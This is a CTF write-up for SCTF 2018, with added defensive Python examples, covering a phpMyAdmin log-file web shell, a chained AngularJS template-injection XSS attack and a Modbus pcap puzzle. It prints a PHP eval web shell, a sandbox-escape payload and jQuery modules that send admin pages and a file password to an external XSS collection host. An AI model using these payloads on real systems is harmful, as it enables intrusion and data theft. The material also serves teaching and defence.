SCTF
__________WEB_____________
Approach: log in to phpMyAdmin with the weak credentials (root / root), then use the general-log feature to get a shell.
Free points, an easy one. http://47.97.214.247:20001/phpmyadmin Alternate address: http://218.245.4.98:20000/phpmyadmin
Enable the general log and write a one-line web shell into it.
Run the SQL query:
<?php @eval($_POST['cmd']);?>
Point the log file at dasdasdas.php under the web root.
Then get the shell.
http://218.245.4.98:20000/dasdasdad.php password: cmd, connected with Caidao (菜刀).
The flag is found on the C drive.
sctf{31cf2213cc49605a30f07395d6e5b9c4}
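As an added defensive example (not part of the original writeup), the Python below scans MySQL general-log entries for the pattern used in this challenge: a SET GLOBAL general_log_file that points into the web document root or at a file with an executable extension, and a query that carries a PHP open tag. The log lines, the web-root paths and the thread ids are constructed for the example.

```python
import re

# Constructed sample entries in MySQL general-log format (not taken from the challenge host).
SAMPLE_LOG = """\
2018-06-22T10:01:02.000000Z   12 Query     SHOW VARIABLES LIKE 'general_log%'
2018-06-22T10:01:10.000000Z   12 Query     SET GLOBAL general_log = 'ON'
2018-06-22T10:01:15.000000Z   12 Query     SET GLOBAL general_log_file = 'C:/phpstudy/WWW/dasdasdas.php'
2018-06-22T10:01:20.000000Z   12 Query     SELECT '<?php @eval($_POST["cmd"]);?>'
2018-06-22T10:02:00.000000Z   13 Query     SELECT name FROM users WHERE id = 1
"""

# Assumption: the document roots of the web servers co-hosted with MySQL.
WEB_ROOTS = ("C:/phpstudy/WWW", "/var/www/html")

LOG_FILE_RE = re.compile(
    r"SET\s+GLOBAL\s+(general_log_file|slow_query_log_file)\s*=\s*['\"]([^'\"]+)['\"]", re.I)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.I)
EXEC_EXTENSIONS = (".php", ".phtml", ".jsp", ".asp", ".aspx")


def classify_query(sql):
    """Return a list of findings for one SQL statement (empty when nothing is suspicious)."""
    findings = []
    m = LOG_FILE_RE.search(sql)
    if m:
        var, path = m.group(1), m.group(2).replace("\\", "/")
        if any(path.lower().startswith(root.lower() + "/") for root in WEB_ROOTS):
            findings.append(f"{var} redirected into web root: {path}")
        if path.lower().endswith(EXEC_EXTENSIONS):
            findings.append(f"{var} given an executable extension: {path}")
    if PHP_TAG_RE.search(sql):
        findings.append("PHP open tag inside a query (web shell staged via log file)")
    return findings


def scan_general_log(text):
    """Walk general-log lines and return (thread_id, finding) pairs for Query entries."""
    alerts = []
    for line in text.splitlines():
        parts = line.split(None, 3)  # timestamp, thread id, command, argument
        if len(parts) == 4 and parts[2] == "Query":
            for finding in classify_query(parts[3]):
                alerts.append((parts[1], finding))
    return alerts


if __name__ == "__main__":
    for thread, finding in scan_general_log(SAMPLE_LOG):
        print(f"thread {thread}: {finding}")
```

The real mitigations sit upstream of detection: no default or weak phpMyAdmin credentials, phpMyAdmin not reachable from the internet, and a MySQL service account without write permission on the web root, so that even a redirected log cannot land where the web server will execute it.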
0x02 The new suggestion board
Approach: the front-end message board has an AngularJS template injection; the JS reveals an API endpoint, and it turns out another account (the admin) has to POST the file access password before the flag can be obtained.
Master has just started learning front-end and wanted to write a suggestion board, but it failed? http://116.62.137.114:4879
AngularJS template injection
Payload:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(123)//');}}
Wrap the body in eval(atob("base64")) so that it is base64-encoded, which bypasses the filter.
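As an added example (not from the original writeup), the Python below does two things a defender of such a message board would want: flag submissions that contain AngularJS interpolation markers together with the sandbox-escape indicators visible in the payload above, and render user text so that AngularJS 1.x never evaluates it. The suspicious message reuses the payload quoted above; the benign message and the indicator list are constructed.

```python
import html
import re

# Constructed: the sandbox-escape payload quoted above, as it would arrive in a message-board POST.
SUSPICIOUS_MESSAGE = "{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(123)//');}}"
# Constructed: braces without any escape indicators (still interpolated by Angular, but harmless).
BENIGN_MESSAGE = "Please add dark mode {{ thanks }}"

# Anything between {{ and }} is an interpolation Angular will evaluate as an expression.
INTERPOLATION_RE = re.compile(r"\{\{.*?\}\}", re.S)
# Substrings typical of AngularJS 1.x sandbox escapes and of encoded second-stage loaders.
ESCAPE_HINTS = ("constructor", "prototype", "$eval", "$$watchers", "eval(", "atob(", "Function(")


def find_template_injection(text):
    """Return (has_interpolation, hints_found) for one user-supplied string."""
    blocks = INTERPOLATION_RE.findall(text)
    hints = [h for h in ESCAPE_HINTS if any(h in b for b in blocks)]
    return bool(blocks), hints


def render_user_text(text):
    """HTML-escape the text and mark the element non-bindable so Angular skips it entirely."""
    return '<p ng-non-bindable>' + html.escape(text, quote=True) + '</p>'


if __name__ == "__main__":
    for msg in (SUSPICIOUS_MESSAGE, BENIGN_MESSAGE):
        print(find_template_injection(msg), render_user_text(msg))
```

HTML-escaping alone does not help here, because {{ and }} are not HTML metacharacters; the ng-non-bindable directive (a real AngularJS 1.x directive) is what keeps the compiler from interpolating the element's content. The robust fix is to keep user data out of compiled templates altogether, for example by binding it with ng-bind rather than writing it into the template source.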
1.1 Use XSS to get the admin backend address
XSS platform address:
http://xsspt.com/aQCIrX?1529652200
Use getScript to load the JS dynamically:
$.getScript('http://xsspt.com/aQCIrX?1529652200');  -> base64 -> JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK
eval(atob("JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK"));
Enter the payload below in the message board to capture the admin's backend address and cookie:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
location : http://127.0.0.1:1002/admin/suggest?suggest=%7B%7B'a'.constructor.prototype.charAt=[].join;$eval('x=1%7D%20%7D%20%7D;eval(atob(%5C'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK%5C'));//');%7D%7D%0D%0A
URL-decoded:
location : http://127.0.0.1:1002/admin/suggest?suggest={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
So the backend lives on the internal network at http://127.0.0.1:1002/admin/
1.2 Use jQuery to fetch the backend page source
First create a new module on the XSS platform, as shown below:
Code:
$.ajax({
    url: "/admin",
    type: "GET",
    dataType: "text",
    success: function(result) {
        var code = btoa(encodeURIComponent(result));
        xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code);
    },
    error: function(msg) { }
});

function xssPost(url, postStr) {
    var de;
    de = document.body.appendChild(document.createElement('iframe'));
    de.src = 'about:blank';
    de.height = 1;
    de.width = 1;
    de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
    de.contentDocument.forms[0].submit();
    de.style.display = 'none';
}
The XSS module that fetches the backend is now created; the existing project has to be switched to this module, since the default is the cookie-grabbing module.
Then enter the payload in the message board again:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
After a short wait, the message arrives.
Copy the base64 string that follows "code:" in the message (the long blob itself is omitted here).
Save it as admin.txt.
Base64-decode it in PentestBox:
> cat admin.txt | base64 -d
Then URL-decode it once more.
The decoded result is saved as admiin.html:
<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- The three meta tags above *must* come first; any other content *must* follow them! -->
  <meta name="description" content="">
  <meta name="author" content="">
  <link rel="icon" href="">
  <title>SYC</title>
  <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
  <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
  <link href="css/starter-template.css" rel="stylesheet">
  <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } </style>
  <script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script>
  <script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js"></script>
  <script src="js/ie-emulation-modes-warning.js"></script>
</head>
<body >
  <nav class="navbar navbar-inverse navbar-fixed-top">
    <div class="container">
      <div class="navbar-header">
        <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
          <span class="sr-only">Toggle navigation</span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
        <a class="navbar-brand" href="/">SYC ADMIN</a>
      </div>
      <div id="navbar" class="collapse navbar-collapse">
        <ul class="nav navbar-nav">
          <li class="active"><a href="#">Home</a></li>
          <li><a href="#">日志</a></li>
          <li><a href="#">帐单</a></li>
          <li><a href="admin/file">文件</a></li>
          <li><a href="admin/suggest">留言</a></li>
          <li><a href="#">发布</a></li>
        </ul>
      </div>
    </div>
  </nav>
  <div class="container">
    <div class="jumbotron">
      <h1>HELLO adminClound</h1>
      <p>新版后台2.0!</p>
    </div>
  </div>
  <!-- Bootstrap core JavaScript ================================================== -->
  <!-- Placed at the end of the document so the pages load faster -->
  <script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script>
  <script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
  <script src="js/ie10-viewport-bug-workaround.js"></script>
</body>
</html>
Admin account found: adminClound
1.3 Use the JS API endpoint to find the file password
The initial home page includes a min-test.js, which leaks the admin template file view/admintest2313.html; that template exposes a memo API endpoint.
Substitute the admin account name and visit http://116.62.137.114:4879/api/memos/adminClound
This returns the file access password.
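The memo endpoint handed out another user's memos just because that user's name appeared in the path. As an added example (hypothetical code, not the challenge's backend), the Python below shows that vulnerable shape beside a hardened handler that resolves the caller from a server-side session and enforces ownership before returning anything. The session table, the memo store and the placeholder memo text are constructed.

```python
from dataclasses import dataclass, field

# Constructed stand-ins for the backend state (hypothetical; not the real application's data).
SESSIONS = {"tok-alice-1": "alice", "tok-admin-9": "adminClound"}   # session token -> user
MEMOS = {
    "adminClound": ["file password: <placeholder, not the real one>"],
    "alice": ["buy milk"],
}
MEMO_PREFIX = "/api/memos/"


@dataclass
class Request:
    """Minimal request model: the path and the cookies the browser sent."""
    path: str
    cookies: dict = field(default_factory=dict)


def memo_user_from_path(path):
    """Extract the user name from /api/memos/<user>, or None if the path is not that route."""
    if path.startswith(MEMO_PREFIX) and len(path) > len(MEMO_PREFIX):
        return path[len(MEMO_PREFIX):]
    return None


def memos_vulnerable(req):
    """Vulnerable shape: whoever names a user in the URL gets that user's memos."""
    user = memo_user_from_path(req.path)
    if user is None:
        return 404, []
    return 200, MEMOS.get(user, [])


def memos_hardened(req):
    """Hardened shape: identify the caller from a server-side session, then check ownership."""
    user = memo_user_from_path(req.path)
    if user is None:
        return 404, []
    caller = SESSIONS.get(req.cookies.get("session", ""))
    if caller is None:
        return 401, []          # not logged in at all
    if caller != user:
        return 403, []          # logged in, but not the owner of these memos
    return 200, MEMOS.get(user, [])


if __name__ == "__main__":
    anon = Request("/api/memos/adminClound")
    print(memos_vulnerable(anon), memos_hardened(anon))
```

The ownership check belongs in the handler, not in the front-end: the writeup shows that the client-side template was readable by anyone, so any authorization decision made there is worthless. Keeping the file password out of a memo store in the first place would have removed the second half of the chain.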
With the file password in hand, craft a request for the /admin/file page in the same way the admin page was fetched above:
<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- The three meta tags above *must* come first; any other content *must* follow them! -->
  <meta name="description" content="">
  <meta name="author" content="">
  <link rel="icon" href="">
  <title>SYC</title>
  <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
  <link href="css/ie10-viewport-bug-workaround.css" rel="stylesheet">
  <link href="css/starter-template.css" rel="stylesheet">
  <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } </style>
  <script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script>
  <script src="https://apps.bdimg.com/libs/angular-route/1.3.13/angular-route.js"></script>
  <script src="js/ie-emulation-modes-warning.js"></script>
</head>
<body >
  <nav class="navbar navbar-inverse navbar-fixed-top">
    <div class="container">
      <div class="navbar-header">
        <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
          <span class="sr-only">Toggle navigation</span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
          <span class="icon-bar"></span>
        </button>
        <a class="navbar-brand" href="/">SYC ADMIN</a>
      </div>
      <div id="navbar" class="collapse navbar-collapse">
        <ul class="nav navbar-nav">
          <li class="active"><a href="#">Home</a></li>
          <li><a href="#">日志</a></li>
          <li><a href="#">帐单</a></li>
          <li><a href="admin/file">文件</a></li>
          <li><a href="admin/suggest">留言</a></li>
          <li><a href="#">发布</a></li>
        </ul>
      </div>
    </div>
  </nav>
  <div class="container">
    <form method="post">
      <label for="filePasswd" class="sr-only">输入文件密码</label>
      <input type="text" id="filePasswd" class="form-control" placeholder="filepasswd" required="" autofocus="" name="filepasswd">
      <button class="btn btn-lg btn-primary btn-block" type="submit">提交</button>
    </form>
  </div>
  <!-- Bootstrap core JavaScript ================================================== -->
  <!-- Placed at the end of the document so the pages load faster -->
  <script src="https://cdn.bootcss.com/jquery/1.12.4/jquery.min.js"></script>
  <script src="https://cdn.bootcss.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
  <script src="js/ie10-viewport-bug-workaround.js"></script>
</body>
</html>
1.4 Submit the file password and get the flag
Again a module has to be set up on the XSS platform and referenced:
$.ajax({
    url: "/admin/file",
    type: "POST",
    dataType: "text",
    data: "filepasswd=HGf^%2639NsslUIf^23",
    success: function(result) {
        var code = btoa(encodeURIComponent(result));
        xssPost('http://xsspt.com/index.php?do=api&id=aQCIrX', code);
    },
    error: function(msg) { }
});

function xssPost(url, postStr) {
    var de;
    de = document.body.appendChild(document.createElement('iframe'));
    de.src = 'about:blank';
    de.height = 1;
    de.width = 1;
    de.contentDocument.write('<form method="POST" action="' + url + '"><input name="code" value="' + postStr + '"/></form>');
    de.contentDocument.forms[0].submit();
    de.style.display = 'none';
}
Submit the payload on the message board once more:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20vYVFDSXJYPzE1Mjk2NTIyMDAnKTsK\'));//');}}
After a short wait, check the XSS platform:
code : c2N0ZiU3QlQ0aXNfaXNfZjFhZzIzMTMlN0Q=
Base64-decode, then URL-decode:
sctf{T4is_is_f1ag2313}
________________MISC________________
0x03 The magical Modbus
Approach: the title says Modbus, so filter on the Modbus protocol and follow the TCP stream to find the flag.
Find the flag.
Attachment: http://sctf2018.xctf.org.cn/media/task/c7348d96-947d-48ef-a91d-2b3eb647d9a9.zip
Download the attachment, unzip it and analyze it in Wireshark.
Before filtering:
After filtering:
Follow the first TCP stream.
The flag is found:
sctf{Easy_Mdbus}
Submitting it turns out to be wrong.
Adding an o and resubmitting is accepted:
sctf{Easy_Modbus}
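As an added example (not part of the writeup), the Python below parses Modbus/TCP frames the way Wireshark's dissector does once the modbus filter is applied: it reads the MBAP header (transaction id, protocol id, length, unit id), splits a reassembled TCP stream into consecutive frames using the length field, and collects the register values carried by Write Multiple Registers requests, so that any ASCII text written to the device becomes readable, which is the same effect as following the TCP stream. The three frames and the text they carry are constructed; the module uses only the standard library.

```python
import struct

MBAP_FMT = ">HHHB"   # transaction id, protocol id (0 = Modbus), length, unit id
MBAP_LEN = 7


def parse_modbus_tcp(payload):
    """Parse one Modbus/TCP ADU (MBAP header + PDU) into a dict; raise ValueError if malformed."""
    if len(payload) < MBAP_LEN + 1:
        raise ValueError("frame too short for MBAP header and function code")
    tid, pid, length, uid = struct.unpack(MBAP_FMT, payload[:MBAP_LEN])
    if pid != 0:
        raise ValueError(f"not Modbus (protocol id {pid})")
    if length != len(payload) - 6:          # length counts unit id + PDU
        raise ValueError("MBAP length field does not match frame size")
    fc = payload[MBAP_LEN]
    return {
        "transaction_id": tid,
        "unit_id": uid,
        "function": fc & 0x7F,
        "exception": bool(fc & 0x80),        # high bit set marks an exception response
        "data": payload[MBAP_LEN + 1:],
    }


def split_stream(stream):
    """Split a reassembled TCP byte stream into consecutive ADUs using the MBAP length field."""
    frames, i = [], 0
    while i + MBAP_LEN <= len(stream):
        length = struct.unpack(">H", stream[i + 4:i + 6])[0]
        end = i + 6 + length
        if end > len(stream):
            raise ValueError("truncated frame at end of stream")
        frames.append(parse_modbus_tcp(stream[i:end]))
        i = end
    return frames


def register_text(frames):
    """Concatenate register bytes from Write Multiple Registers (0x10) requests, printable ASCII only."""
    out = bytearray()
    for f in frames:
        if f["function"] == 0x10 and len(f["data"]) >= 5:
            count = f["data"][4]             # start addr (2), quantity (2), byte count (1), values
            out += f["data"][5:5 + count]
    return "".join(chr(b) for b in out if 32 <= b < 127)


def build_frame(tid, unit, fc, pdu_data):
    """Constructed-frame helper for the sample below (protocol id 0, length = unit id + PDU)."""
    pdu = bytes([fc]) + pdu_data
    return struct.pack(MBAP_FMT, tid, 0, len(pdu) + 1, unit) + pdu


# Constructed stream: one Read Holding Registers request, then two Write Multiple Registers
# requests whose register values spell out text. Not captured from the challenge pcap.
SAMPLE_STREAM = (
    build_frame(1, 1, 0x03, struct.pack(">HH", 0, 10))
    + build_frame(2, 1, 0x10, struct.pack(">HHB", 0, 3, 6) + b"hello_")
    + build_frame(3, 1, 0x10, struct.pack(">HHB", 3, 3, 6) + b"modbus")
)


if __name__ == "__main__":
    frames = split_stream(SAMPLE_STREAM)
    for f in frames:
        print(f"tid={f['transaction_id']} unit={f['unit_id']} fc=0x{f['function']:02x} data={f['data'].hex()}")
    print("register text:", register_text(frames))
```

Parsing the frames rather than eyeballing the raw stream is what makes the approach reusable: the same loop can pick out exception responses (fc & 0x80) or writes to unexpected register ranges, which is the basic signal a monitor on an industrial network looks for.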